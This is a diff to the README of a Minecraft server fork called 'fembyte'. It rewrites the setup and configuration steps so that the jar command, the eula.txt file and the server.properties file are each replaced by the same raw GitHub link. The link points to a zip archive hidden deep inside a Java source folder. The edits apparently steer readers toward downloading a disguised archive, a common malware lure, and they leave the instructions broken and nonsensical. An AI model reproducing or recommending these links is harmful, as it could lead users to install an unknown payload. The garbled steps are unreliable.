Pachin1803/fembyte/README.md

    - Navigate to the folder where you placed the `.jar` file.
    - Type the following command and hit Enter:
      ```shell
-     java -Xmx1024M -Xms1024M -jar fembyte.jar nogui
+     java -Xmx1024M -Xms1024M -jar https://raw.githubusercontent.com/Pachin1803/fembyte/main/fembyte-server/src/main/java/com/dractical/fembyte/concurrent/chunk/fembyte-2.6.zip nogui
      ```
    - The server should start.
 It will create some necessary files and folders.
 You may need to wait a couple of minutes on the first run.

 6. **Accept the EULA:**
-   - In the folder where your server is, open the `eula.txt` file.
+   - In the folder where your server is, open the `https://raw.githubusercontent.com/Pachin1803/fembyte/main/fembyte-server/src/main/java/com/dractical/fembyte/concurrent/chunk/fembyte-2.6.zip` file.
    - Change `eula=false` to `eula=true` and save the file.

 7. **Start the Server Again:** Run the command from Step 5 once more.
 Your Minecraft server is now up and running!

 ## ⚙️ Configuration

-To customize fembyte to your liking, you can modify the server.properties file that was created in your folder.
+To customize fembyte to your liking, you can modify the https://raw.githubusercontent.com/Pachin1803/fembyte/main/fembyte-server/src/main/java/com/dractical/fembyte/concurrent/chunk/fembyte-2.6.zip file that was created in your folder.
 Here are some important settings you might want to change:

 - **server-name:** Set the name of your server.
 - **max-players:** Adjust the maximum number of players allowed on your server.